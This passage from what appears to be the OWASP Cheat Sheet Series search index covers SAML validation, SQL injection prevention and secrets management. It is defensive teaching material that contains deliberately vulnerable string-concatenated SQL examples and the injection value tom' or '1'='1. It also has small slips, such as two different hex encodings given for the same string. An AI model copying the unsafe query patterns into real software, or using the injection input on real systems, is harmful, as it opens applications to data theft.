
"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#validate-message-confidentiality-and-integrity","title":"Validate Message Confidentiality and Integrity","text":"

TLS 1.2 is the most common solution to guarantee message confidentiality and integrity at the transport layer. Refer to SAML Security (section 4.2.1) for additional information. This step will help counter the following attacks:

A digitally signed message with a certified key is the most common solution to guarantee message integrity and authentication. Refer to SAML Security (section 4.3) for additional information. This step will help counter the following attacks:

Assertions may be encrypted via XMLEnc to prevent disclosure of sensitive attributes post transportation. Refer to SAML Security (section 4.2.2) for additional information. This step will help counter the following attacks:

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#validate-protocol-usage","title":"Validate Protocol Usage","text":"

This is a common area for security gaps - see Google SSO vulnerability for a real life example. Their SSO profile was vulnerable to a Man-in-the-middle attack from a malicious SP (Service Provider).

The SSO Web Browser Profile is most susceptible to attacks from trusted partners. This particular security flaw was exposed because the SAML Response did not contain all of the required data elements necessary for a secure message exchange. Following the SAML Profile usage requirements for AuthnRequest (4.1.4.1) and Response (4.1.4.2) will help counter this attack.

The AVANTSSAR team suggested the following data elements should be required:

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#validate-signatures","title":"Validate Signatures","text":"

Vulnerabilities in SAML implementations due to XML Signature Wrapping attacks were described in 2012, On Breaking SAML: Be Whoever You Want to Be.

The following recommendations were proposed in response (Secure SAML validation to prevent XML signature wrapping attacks):

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#validate-protocol-processing-rules","title":"Validate Protocol Processing Rules","text":"

This is another common area for security gaps simply because of the vast number of steps to assert.

Processing a SAML response is an expensive operation but all steps must be validated:

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#validate-binding-implementation","title":"Validate Binding Implementation","text":""},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#validate-security-countermeasures","title":"Validate Security Countermeasures","text":"

Revisit each security threat that exists within the SAML Security document and assert you have applied the appropriate countermeasures for threats that may exist for your particular implementation.

Additional countermeasures considered should include:

Need an architectural diagram? The SAML technical overview contains the most complete diagrams. For the Web Browser SSO Profile with Redirect/POST bindings refer to the section 4.1.3. In fact, of all the SAML documentation, the technical overview is the most valuable from a high-level perspective.

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#unsolicited-response-ie-idp-initiated-sso-considerations-for-service-providers","title":"Unsolicited Response (ie. IdP Initiated SSO) Considerations for Service Providers","text":"

Unsolicited Response is inherently less secure by design due to the lack of CSRF protection. However, it is supported by many due to the backwards compatibility feature of SAML 1.1. The general security recommendation is to not support this type of authentication, but if it must be enabled, the following steps (in additional to everything mentioned above) should help you secure this flow:

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#identity-provider-and-service-provider-considerations","title":"Identity Provider and Service Provider Considerations","text":"

The SAML protocol is rarely the vector of choice, though it's important to have cheatsheets to make sure that this is robust. The various endpoints are more targeted, so how the SAML token is generated and how it is consumed are both important in practice.

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#identity-provider-idp-considerations","title":"Identity Provider (IdP) Considerations","text":""},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#service-provider-sp-considerations","title":"Service Provider (SP) Considerations","text":""},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#input-validation","title":"Input Validation","text":"

Just because SAML is a security protocol does not mean that input validation goes away.

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#cryptography","title":"Cryptography","text":"

Solutions relying cryptographic algorithms need to follow the latest developments in cryptoanalysis.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html","title":"SQL Injection Prevention Cheat Sheet","text":""},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article is focused on providing clear, simple, actionable guidance for preventing SQL Injection flaws in your applications. SQL Injection attacks are unfortunately very common, and this is due to two factors:

  1. the significant prevalence of SQL Injection vulnerabilities, and
  2. the attractiveness of the target (i.e., the database typically contains all the interesting/critical data for your application).

SQL Injection flaws are introduced when software developers create dynamic database queries constructed with string concatenation which includes user supplied input. To avoid SQL injection flaws is simple. Developers need to either: a) stop writing dynamic queries with string concatenation; and/or b) prevent user supplied input which contains malicious SQL from affecting the logic of the executed query.

This article provides a set of simple techniques for preventing SQL Injection vulnerabilities by avoiding these two problems. These techniques can be used with practically any kind of programming language with any type of database. There are other types of databases, like XML databases, which can have similar problems (e.g., XPath and XQuery injection) and these techniques can be used to protect them as well.

Primary Defenses:

Additional Defenses:

Unsafe Example:

SQL injection flaws typically look like this:

The following (Java) example is UNSAFE, and would allow an attacker to inject code into the query that would be executed by the database. The unvalidated \"customerName\" parameter that is simply appended to the query allows an attacker to inject any SQL code they want. Unfortunately, this method for accessing databases is all too common.

String\u00a0query\u00a0=\u00a0\"SELECT\u00a0account_balance\u00a0FROM\u00a0user_data\u00a0WHERE\u00a0user_name\u00a0=\u00a0\"\n+\u00a0request.getParameter(\"customerName\");\ntry\u00a0{\nStatement\u00a0statement\u00a0=\u00a0connection.createStatement(\u00a0...\u00a0);\nResultSet\u00a0results\u00a0=\u00a0statement.executeQuery(\u00a0query\u00a0);\n}\n...\n
"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#primary-defenses","title":"Primary Defenses","text":""},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#defense-option-1-prepared-statements-with-parameterized-queries","title":"Defense Option 1: Prepared Statements (with Parameterized Queries)","text":"

The use of prepared statements with variable binding (aka parameterized queries) is how all developers should first be taught how to write database queries. They are simple to write, and easier to understand than dynamic queries. Parameterized queries force the developer to first define all the SQL code, and then pass in each parameter to the query later. This coding style allows the database to distinguish between code and data, regardless of what user input is supplied.

Prepared statements ensure that an attacker is not able to change the intent of a query, even if SQL commands are inserted by an attacker. In the safe example below, if an attacker were to enter the userID of tom' or '1'='1, the parameterized query would not be vulnerable and would instead look for a username which literally matched the entire string tom' or '1'='1.

Language specific recommendations:

In rare circumstances, prepared statements can harm performance. When confronted with this situation, it is best to either a) strongly validate all data or b) escape all user supplied input using an escaping routine specific to your database vendor as described below, rather than using a prepared statement.

Safe Java Prepared Statement Example:

The following code example uses a PreparedStatement, Java's implementation of a parameterized query, to execute the same database query.

//\u00a0This\u00a0should\u00a0REALLY\u00a0be\u00a0validated\u00a0too\nString\u00a0custname\u00a0=\u00a0request.getParameter(\"customerName\");\n//\u00a0Perform\u00a0input\u00a0validation\u00a0to\u00a0detect\u00a0attacks\nString\u00a0query\u00a0=\u00a0\"SELECT\u00a0account_balance\u00a0FROM\u00a0user_data\u00a0WHERE\u00a0user_name\u00a0=\u00a0?\u00a0\";\nPreparedStatement pstmt = connection.prepareStatement( query );\npstmt.setString(\u00a01,\u00a0custname);\nResultSet\u00a0results\u00a0=\u00a0pstmt.executeQuery(\u00a0);\n

Safe C# .NET Prepared Statement Example:

With .NET, it's even more straightforward. The creation and execution of the query doesn't change. All you have to do is simply pass the parameters to the query using the Parameters.Add() call as shown here.

String\u00a0query\u00a0=\u00a0\"SELECT\u00a0account_balance\u00a0FROM\u00a0user_data\u00a0WHERE\u00a0user_name\u00a0=\u00a0?\";\ntry\u00a0{\nOleDbCommand\u00a0command\u00a0=\u00a0new\u00a0OleDbCommand(query,\u00a0connection);\ncommand.Parameters.Add(new OleDbParameter(\"customerName\", CustomerName Name.Text));\nOleDbDataReader\u00a0reader\u00a0=\u00a0command.ExecuteReader();\n//\u00a0\u2026\n}\u00a0catch\u00a0(OleDbException\u00a0se)\u00a0{\n//\u00a0error\u00a0handling\n}\n

We have shown examples in Java and .NET but practically all other languages, including Cold Fusion, and Classic ASP, support parameterized query interfaces. Even SQL abstraction layers, like the Hibernate Query Language (HQL) have the same type of injection problems (which we call HQL Injection). HQL supports parameterized queries as well, so we can avoid this problem:

Hibernate Query Language (HQL) Prepared Statement (Named Parameters) Examples:

//First\u00a0is\u00a0an\u00a0unsafe\u00a0HQL\u00a0Statement\nQuery\u00a0unsafeHQLQuery\u00a0=\u00a0session.createQuery(\"from\u00a0Inventory\u00a0where\u00a0productID='\"+userSuppliedParameter+\"'\");\n//Here\u00a0is\u00a0a\u00a0safe\u00a0version\u00a0of\u00a0the\u00a0same\u00a0query\u00a0using\u00a0named\u00a0parameters\nQuery\u00a0safeHQLQuery\u00a0=\u00a0session.createQuery(\"from\u00a0Inventory\u00a0where\u00a0productID=:productid\");\nsafeHQLQuery.setParameter(\"productid\",\u00a0userSuppliedParameter);\n

For examples of parameterized queries in other languages, including Ruby, PHP, Cold Fusion, Perl, and Rust, see the Query Parameterization Cheat Sheet or this site.

Developers tend to like the Prepared Statement approach because all the SQL code stays within the application. This makes your application relatively database independent.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#defense-option-2-stored-procedures","title":"Defense Option 2: Stored Procedures","text":"

Stored procedures are not always safe from SQL injection. However, certain standard stored procedure programming constructs have the same effect as the use of parameterized queries when implemented safely which is the norm for most stored procedure languages.

They require the developer to just build SQL statements with parameters which are automatically parameterized unless the developer does something largely out of the norm. The difference between prepared statements and stored procedures is that the SQL code for a stored procedure is defined and stored in the database itself, and then called from the application. Both of these techniques have the same effectiveness in preventing SQL injection so your organization should choose which approach makes the most sense for you.

Note: \"Implemented safely\" means the stored procedure does not include any unsafe dynamic SQL generation. Developers do not usually generate dynamic SQL inside stored procedures. However, it can be done, but should be avoided. If it can't be avoided, the stored procedure must use input validation or proper escaping as described in this article to make sure that all user supplied input to the stored procedure can't be used to inject SQL code into the dynamically generated query. Auditors should always look for uses of sp_execute, execute or exec within SQL Server stored procedures. Similar audit guidelines are necessary for similar functions for other vendors.

There are also several cases where stored procedures can increase risk. For example, on MS SQL server, you have 3 main default roles: db_datareader, db_datawriter and db_owner. Before stored procedures came into use, DBA's would give db_datareader or db_datawriter rights to the webservice's user, depending on the requirements. However, stored procedures require execute rights, a role that is not available by default. Some setups where the user management has been centralized, but is limited to those 3 roles, cause all web apps to run under db_owner rights so stored procedures can work. Naturally, that means that if a server is breached the attacker has full rights to the database, where previously they might only have had read-access.

Safe Java Stored Procedure Example:

The following code example uses a CallableStatement, Java's implementation of the stored procedure interface, to execute the same database query. The sp_getAccountBalance stored procedure would have to be predefined in the database and implement the same functionality as the query defined above.

//\u00a0This\u00a0should\u00a0REALLY\u00a0be\u00a0validated\nString\u00a0custname\u00a0=\u00a0request.getParameter(\"customerName\");\ntry\u00a0{\nCallableStatement cs = connection.prepareCall(\"{call sp_getAccountBalance(?)}\");\ncs.setString(1, custname);\nResultSet\u00a0results\u00a0=\u00a0cs.executeQuery();\n//\u00a0\u2026\u00a0result\u00a0set\u00a0handling\n}\u00a0catch\u00a0(SQLException\u00a0se)\u00a0{\n//\u00a0\u2026\u00a0logging\u00a0and\u00a0error\u00a0handling\n}\n

Safe VB .NET Stored Procedure Example:

The following code example uses a SqlCommand, .NET's implementation of the stored procedure interface, to execute the same database query. The sp_getAccountBalance stored procedure would have to be predefined in the database and implement the same functionality as the query defined above.

\u00a0Try\nDim\u00a0command\u00a0As\u00a0SqlCommand\u00a0=\u00a0new\u00a0SqlCommand(\"sp_getAccountBalance\",\u00a0connection)\ncommand.CommandType = CommandType.StoredProcedure\ncommand.Parameters.Add(new SqlParameter(\"@CustomerName\", CustomerName.Text))\nDim\u00a0reader\u00a0As\u00a0SqlDataReader\u00a0=\u00a0command.ExecuteReader()\n'...\nCatch\u00a0se\u00a0As\u00a0SqlException\n'error\u00a0handling\nEnd\u00a0Try\n
"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#defense-option-3-allow-list-input-validation","title":"Defense Option 3: Allow-list Input Validation","text":"

Various parts of SQL queries aren't legal locations for the use of bind variables, such as the names of tables or columns, and the sort order indicator (ASC or DESC). In such situations, input validation or query redesign is the most appropriate defense. For the names of tables or columns, ideally those values come from the code, and not from user parameters.

But if user parameter values are used for targeting different table names and column names, then the parameter values should be mapped to the legal/expected table or column names to make sure unvalidated user input doesn't end up in the query. Please note, this is a symptom of poor design and a full rewrite should be considered if time allows.

Here is an example of table name validation.

String\u00a0tableName;\nswitch(PARAM):\n\u00a0\u00a0case\u00a0\"Value1\":\u00a0tableName\u00a0=\u00a0\"fooTable\";\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0break;\n\u00a0\u00a0case\u00a0\"Value2\":\u00a0tableName\u00a0=\u00a0\"barTable\";\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0break;\n\u00a0\u00a0...\n \u00a0default\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0:\u00a0throw\u00a0new\u00a0InputValidationException(\"unexpected\u00a0value\u00a0provided\"\n                                                  + \" for\u00a0table\u00a0name\");\n

The tableName can then be directly appended to the SQL query since it is now known to be one of the legal and expected values for a table name in this query. Keep in mind that generic table validation functions can lead to data loss as table names are used in queries where they are not expected.

For something simple like a sort order, it would be best if the user supplied input is converted to a boolean, and then that boolean is used to select the safe value to append to the query. This is a very standard need in dynamic query creation.

For example:

public\u00a0String\u00a0someMethod(boolean\u00a0sortOrder)\u00a0{\nString\u00a0SQLquery\u00a0=\u00a0\"some\u00a0SQL\u00a0...\u00a0order\u00a0by\u00a0Salary\u00a0\"\u00a0+\u00a0(sortOrder\u00a0?\u00a0\"ASC\"\u00a0:\u00a0\"DESC\");`\n...\n

Any time user input can be converted to a non-String, like a date, numeric, boolean, enumerated type, etc. before it is appended to a query, or used to select a value to append to the query, this ensures it is safe to do so.

Input validation is also recommended as a secondary defense in ALL cases, even when using bind variables as is discussed later in this article. More techniques on how to implement strong input validation is described in the Input Validation Cheat Sheet.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#defense-option-4-escaping-all-user-supplied-input","title":"Defense Option 4: Escaping All User-Supplied Input","text":"

This technique should only be used as a last resort, when none of the above are feasible. Input validation is probably a better choice as this methodology is frail compared to other defenses and we cannot guarantee it will prevent all SQL Injections in all situations.

This technique is to escape user input before putting it in a query. It is very database specific in its implementation. It's usually only recommended to retrofit legacy code when implementing input validation isn't cost effective. Applications built from scratch, or applications requiring low risk tolerance should be built or re-written using parameterized queries, stored procedures, or some kind of Object Relational Mapper (ORM) that builds your queries for you.

This technique works like this. Each DBMS supports one or more character escaping schemes specific to certain kinds of queries. If you then escape all user supplied input using the proper escaping scheme for the database you are using, the DBMS will not confuse that input with SQL code written by the developer, thus avoiding any possible SQL injection vulnerabilities.

The OWASP Enterprise Security API (ESAPI) is a free, open source, web application security control library that makes it easier for programmers to write lower-risk applications. The ESAPI libraries are designed to make it easier for programmers to retrofit security into existing applications. The ESAPI libraries also serve as a solid foundation for new development:

To find the javadoc specifically for the database encoders, click on the Codec class on the left hand side. There are lots of Codecs implemented. The two Database specific codecs are OracleCodec, and MySQLCodec.

Just click on their names in the All Known Implementing Classes: at the top of the Interface Codec page.

At this time, ESAPI currently has database encoders for:

Database encoders are forthcoming for:

If your database encoder is missing, please let us know.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#database-specific-escaping-details","title":"Database Specific Escaping Details","text":"

If you want to build your own escaping routines, here are the escaping details for each of the databases that we have developed ESAPI Encoders for:

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#oracle-escaping","title":"Oracle Escaping","text":"

This information is based on the Oracle Escape character information.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#escaping-dynamic-queries","title":"Escaping Dynamic Queries","text":"

To use an ESAPI database codec is pretty simple. An Oracle example looks something like:

ESAPI.encoder().encodeForSQL(\u00a0new\u00a0OracleCodec(),\u00a0queryparam\u00a0);\n

So, if you had an existing Dynamic query being generated in your code that was going to Oracle that looked like this:

String\u00a0query\u00a0=\u00a0\"SELECT\u00a0user_id\u00a0FROM\u00a0user_data\u00a0WHERE\u00a0user_name\u00a0=\u00a0'\"\n+\u00a0req.getParameter(\"userID\")\n+\u00a0\"'\u00a0and\u00a0user_password\u00a0=\u00a0'\"\u00a0+\u00a0req.getParameter(\"pwd\")\u00a0+\"'\";\ntry\u00a0{\nStatement\u00a0statement\u00a0=\u00a0connection.createStatement(\u00a0\u2026\u00a0);\nResultSet\u00a0results\u00a0=\u00a0statement.executeQuery(\u00a0query\u00a0);\n}\n

You would rewrite the first line to look like this:

Codec ORACLE_CODEC = new OracleCodec();\nString query = \"SELECT user_id FROM user_data WHERE user_name = '\"\n+ ESAPI.encoder().encodeForSQL( ORACLE_CODEC, req.getParameter(\"userID\"))\n+ \"' and user_password = '\"\n+ ESAPI.encoder().encodeForSQL( ORACLE_CODEC, req.getParameter(\"pwd\")) +\"'\";\n

And it would now be safe from SQL injection, regardless of the input supplied.

For maximum code readability, you could also construct your own OracleEncoder:

Encoder oe = new OracleEncoder();\nString query = \"SELECT user_id FROM user_data WHERE user_name = '\"\n+ oe.encode( req.getParameter(\"userID\")) + \"' and user_password = '\"\n+ oe.encode( req.getParameter(\"pwd\")) +\"'\";\n

With this type of solution, you would need only to wrap each user-supplied parameter being passed into an ESAPI.encoder().encodeForOracle( ) call or whatever you named the call and you would be done.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#turn-off-character-replacement","title":"Turn off character replacement","text":"

Use SET DEFINE OFF or SET SCAN OFF to ensure that automatic character replacement is turned off. If this character replacement is turned on, the & character will be treated like a SQLPlus variable prefix that could allow an attacker to retrieve private data.

See here and here for more information

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#escaping-wildcard-characters-in-like-clauses","title":"Escaping Wildcard characters in Like Clauses","text":"

The LIKE keyword allows for text scanning searches. In Oracle, the underscore _ character matches only one character, while the ampersand % is used to match zero or more occurrences of any characters. These characters must be escaped in LIKE clause criteria.

For example:

SELECT\u00a0name\u00a0FROM\u00a0emp\u00a0WHERE\u00a0id\u00a0LIKE\u00a0'%/_%'\u00a0ESCAPE\u00a0'/';\n\nSELECT\u00a0name\u00a0FROM\u00a0emp\u00a0WHERE\u00a0id\u00a0LIKE\u00a0'%\\%%'\u00a0ESCAPE\u00a0'\\';\n
"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#oracle-10g-escaping","title":"Oracle 10g escaping","text":"

An alternative for Oracle 10g and later is to place { and } around the string to escape the entire string. However, you have to be careful that there isn't a } character already in the string. You must search for these and if there is one, then you must replace it with }}. Otherwise that character will end the escaping early, and may introduce a vulnerability.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#mysql-escaping","title":"MySQL Escaping","text":"

MySQL supports two escaping modes:

  1. ANSI_QUOTES SQL mode, and a mode with this off, which we call
  2. MySQL mode.

ANSI SQL mode: Simply encode all ' (single tick) characters with '' (two single ticks)

MySQL mode, do the following:

NUL (0x00) --> \\0  [This is a zero, not the letter O]\nBS  (0x08) --> \\b\nTAB (0x09) --> \\t\nLF  (0x0a) --> \\n\nCR  (0x0d) --> \\r\nSUB (0x1a) --> \\Z\n\"   (0x22) --> \\\"\n%   (0x25) --> \\%\n'   (0x27) --> \\'\n\\   (0x5c) --> \\\\\n_   (0x5f) --> \\_\nall other non-alphanumeric characters with ASCII values\nless than 256  --> \\c where 'c' is the original non-alphanumeric character.\n

This information is based on the MySQL Escape character information.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#sql-server-escaping","title":"SQL Server Escaping","text":"

We have not implemented the SQL Server escaping routine yet, but the following has good pointers and links to articles describing how to prevent SQL injection attacks on SQL server, see here.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#db2-escaping","title":"DB2 Escaping","text":"

This information is based on DB2 WebQuery special characters as well as some information from Oracle's JDBC DB2 driver.

Information in regards to differences between several DB2 Universal drivers.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#hex-encoding-all-input","title":"Hex-encoding all input","text":"

A somewhat special case of escaping is the process of hex-encode the entire string received from the user (this can be seen as escaping every character). The web application should hex-encode the user input before including it in the SQL statement. The SQL statement should take into account this fact, and accordingly compare the data.

For example, if we have to look up a record matching a sessionID, and the user transmitted the string abc123 as the session ID, the select statement would be:

SELECT\u00a0...\u00a0FROM\u00a0session WHERE\u00a0hex_encode(sessionID)\u00a0=\u00a0'616263313233'\n

hex_encode should be replaced by the particular facility for the database being used. The string 606162313233 is the hex encoded version of the string received from the user (it is the sequence of hex values of the ASCII/UTF-8 codes of the user data).

If an attacker were to transmit a string containing a single-quote character followed by their attempt to inject SQL code, the constructed SQL statement will only look like:

... WHERE\u00a0hex_encode\u00a0(\u00a0...\u00a0)\u00a0=\u00a0'2720\u00a0...\u00a0'\n

27 being the ASCII code (in hex) of the single-quote, which is simply hex-encoded like any other character in the string. The resulting SQL can only contain numeric digits and letters a to f, and never any special character that could enable an SQL injection.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#escaping-sqli-in-php","title":"Escaping SQLi in PHP","text":"

Use prepared statements and parameterized queries. These are SQL statements that are sent to and parsed by the database server separately from any parameters. This way it is impossible for an attacker to inject malicious SQL.

You basically have two options to achieve this:

  1. Using PDO (for any supported database driver):
$stmt = $pdo->prepare('SELECT * FROM employees WHERE name = :name');\n$stmt->execute(array('name' => $name));\nforeach ($stmt as $row) {\n    // do something with $row\n}\n
  1. Using MySQLi (for MySQL):
$stmt = $dbConnection->prepare('SELECT * FROM employees WHERE name = ?');\n$stmt->bind_param('s', $name);\n$stmt->execute();\n$result = $stmt->get_result();\nwhile ($row = $result->fetch_assoc()) {\n    // do something with $row\n}\n

PDO is the universal option. If you're connecting to a database other than MySQL, you can refer to a driver-specific second option (e.g. pg_prepare() and pg_execute() for PostgreSQL).

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#additional-defenses","title":"Additional Defenses","text":"

Beyond adopting one of the four primary defenses, we also recommend adopting all of these additional defenses in order to provide defense in depth. These additional defenses are:

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#least-privilege","title":"Least Privilege","text":"

To minimize the potential damage of a successful SQL injection attack, you should minimize the privileges assigned to every database account in your environment. Do not assign DBA or admin type access rights to your application accounts. We understand that this is easy, and everything just \"works\" when you do it this way, but it is very dangerous.

Start from the ground up to determine what access rights your application accounts require, rather than trying to figure out what access rights you need to take away. Make sure that accounts that only need read access are only granted read access to the tables they need access to.

If an account only needs access to portions of a table, consider creating a view that limits access to that portion of the data and assigning the account access to the view instead, rather than the underlying table. Rarely, if ever, grant create or delete access to database accounts.

If you adopt a policy where you use stored procedures everywhere, and don't allow application accounts to directly execute their own queries, then restrict those accounts to only be able to execute the stored procedures they need. Don't grant them any rights directly to the tables in the database.

SQL injection is not the only threat to your database data. Attackers can simply change the parameter values from one of the legal values they are presented with, to a value that is unauthorized for them, but the application itself might be authorized to access. As such, minimizing the privileges granted to your application will reduce the likelihood of such unauthorized access attempts, even when an attacker is not trying to use SQL injection as part of their exploit.

While you are at it, you should minimize the privileges of the operating system account that the DBMS runs under. Don't run your DBMS as root or system! Most DBMSs run out of the box with a very powerful system account. For example, MySQL runs as system on Windows by default! Change the DBMS's OS account to something more appropriate, with restricted privileges.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#multiple-db-users","title":"Multiple DB Users","text":"

The designers of web applications should avoid using the same owner/admin account in the web applications to connect to the database. Different DB users should be used for different web applications.

In general, each separate web application that requires access to the database should have a designated database user account that the application will use to connect to the DB. That way, the designer of the application can have good granularity in the access control, thus reducing the privileges as much as possible. Each DB user will then have select access to what it needs only, and write-access as needed.

As an example, a login page requires read access to the username and password fields of a table, but no write access of any form (no insert, update, or delete). However, the sign-up page certainly requires insert privilege to that table; this restriction can only be enforced if these web apps use different DB users to connect to the database.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#views","title":"Views","text":"

You can use SQL views to further increase the granularity of access by limiting the read access to specific fields of a table or joins of tables. It could potentially have additional benefits: for example, suppose that the system is required (perhaps due to some specific legal requirements) to store the passwords of the users, instead of salted-hashed passwords.

The designer could use views to compensate for this limitation; revoke all access to the table (from all DB users except the owner/admin) and create a view that outputs the hash of the password field and not the field itself. Any SQL injection attack that succeeds in stealing DB information will be restricted to stealing the hash of the passwords (could even be a keyed hash), since no DB user for any of the web applications has access to the table itself.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#allow-list-input-validation","title":"Allow-list Input Validation","text":"

In addition to being a primary defense when nothing else is possible (e.g., when a bind variable isn't legal), input validation can also be a secondary defense used to detect unauthorized input before it is passed to the SQL query. For more information please see the Input Validation Cheat Sheet. Proceed with caution here. Validated data is not necessarily safe to insert into SQL queries via string building.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#related-articles","title":"Related Articles","text":"

SQL Injection Attack Cheat Sheets:

The following articles describe how to exploit different kinds of SQL Injection Vulnerabilities on various platforms that this article was created to help you avoid:

Description of SQL Injection Vulnerabilities:

How to Avoid SQL Injection Vulnerabilities:

How to Review Code for SQL Injection Vulnerabilities:

How to Test for SQL Injection Vulnerabilities:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html","title":"Secrets Management Cheat Sheet","text":""},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#1-introduction","title":"1 Introduction","text":"

Secrets are being used everywhere nowadays, especially with the popularity of the DevOps movement. Application Programming Interface (API) keys, database credentials, Identity and Access Management (IAM) permissions, Secure Shell (SSH) keys, certificates, etc. Many organizations have them hardcoded within the source code in plaintext, littered throughout configuration files and configuration management tools.

There is a growing need for organizations to centralize the storage, provisioning, auditing, rotation and management of secrets to control access to secrets and prevent them from leaking and compromising the organization. Often, services share the same secrets, which makes identifying the source of compromise or leak challenging.

This cheat sheet offers best practices and guidelines to help properly implement secrets management.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#2-general-secrets-management","title":"2 General Secrets Management","text":"

The following sections address the main concepts relating to secrets management.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#21-high-availability","title":"2.1 High Availability","text":"

It is vital to select a technology that is robust enough to service traffic reliably:

Such a service could receive a considerable volume of requests within a large organization.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#22-centralize-and-standardize","title":"2.2 Centralize and Standardize","text":"

Secrets used by your DevOps teams for your applications might be consumed differently than secrets stored by your marketeers or your SRE team. You often find poorly maintained secrets where the needs of secret consumers or producers mismatch. Therefore, you must standardize and centralize the secrets management solution with care. Standardizing and centralizing can mean that you use multiple secret management solutions. For instance: your cloud-native development teams choose to use the solution provided by the cloud provider, while your private cloud uses a third-party solution, and everybody has an account for a selected password manager. By making sure that the teams standardize the interaction with these different solutions, they remain maintainable and usable in the event of an incident. Even when a company centralizes its secrets management to just one solution, you will often have to secure the master secret of that secrets management solution in a secondary secrets management solution. For instance, you can use a cloud provider's facilities to store secrets, but that cloud provider's root/management credentials need to be stored somewhere else.

Standardization should include Secrets life cycle management, Authentication, Authorization, and Accounting of the secrets management solution, and life cycle management. Note that it should be immediately apparent to an organization what a secret is used for and where to find it. The more Secrets management solutions you use, the more documentation you need.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#23-access-control","title":"2.3 Access Control","text":"

When users can read the secret in a secret management system and/or update it, it means that the secret can now leak through that user and the system he used to touch the secret. Therefore, engineers should not have access to all secrets in the secrets management system, and the Least Privilege principle should be applied. The secret management system needs to provide the ability to configure fine granular access controls on each object and component to accomplish the Least Privilege principle.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#24-automate-secrets-management","title":"2.4 Automate Secrets Management","text":"

Manual maintenance does not only increase the risk of leakage; it introduces the risk of human errors while maintaining the secret. Furthermore, it can become wasteful. Therefore, it is better to limit or remove the human interaction with the actual secrets. You can restrict human interaction in multiple ways:

Rotating certain keys, such as encryption keys, might trigger full or partial data re-encryption. Different strategies for rotating keys exist:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#25-auditing","title":"2.5 Auditing","text":"

Auditing is an essential part of secrets management due to the nature of the application. You must implement auditing securely to be resilient against attempts to tamper with or delete the audit logs. At a minimum, you should audit the following:

It is essential that all auditing has correct timestamps. Therefore, the secret management solution should have proper time sync protocols set up at its supporting infrastructure. You should monitor the stack on which the solution runs for possible clock-skew and manual time adjustments.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#26-secret-lifecycle","title":"2.6 Secret Lifecycle","text":"

Secrets follow a lifecycle. The stages of the lifecycle are as follows:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#261-creation","title":"2.6.1 Creation","text":"

New secrets must be securely generated and cryptographically robust enough for their purpose. Secrets must have the minimum privileges assigned to them to enable their required use/role.

You should transmit credentials securely, such that ideally, you don't send the password along with the username when requesting user accounts. Instead, you should send the password via a secure channel (e.g. mutually authenticated connection) or a side-channel such as push notification, SMS, email. Refer to the Multi-Factor Authentication Cheat Sheet to learn about the pros and cons of each channel.

Applications may not benefit from having multiple communication channels, so you must provision credentials securely.

See the Open CRE project on secrets lookup for more technical recommendations on secret creation.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#262-rotation","title":"2.6.2 Rotation","text":"

You should regularly rotate secrets so that any stolen credentials will only work for a short time. Regular rotation will also reduce the tendency for users to fall back to bad habits such as re-using credentials.

Depending on a secret's function and what it protects, the lifetime could be from minutes (think end-to-end encrypted chats with perfect forward secrecy) to years (consider hardware secrets).

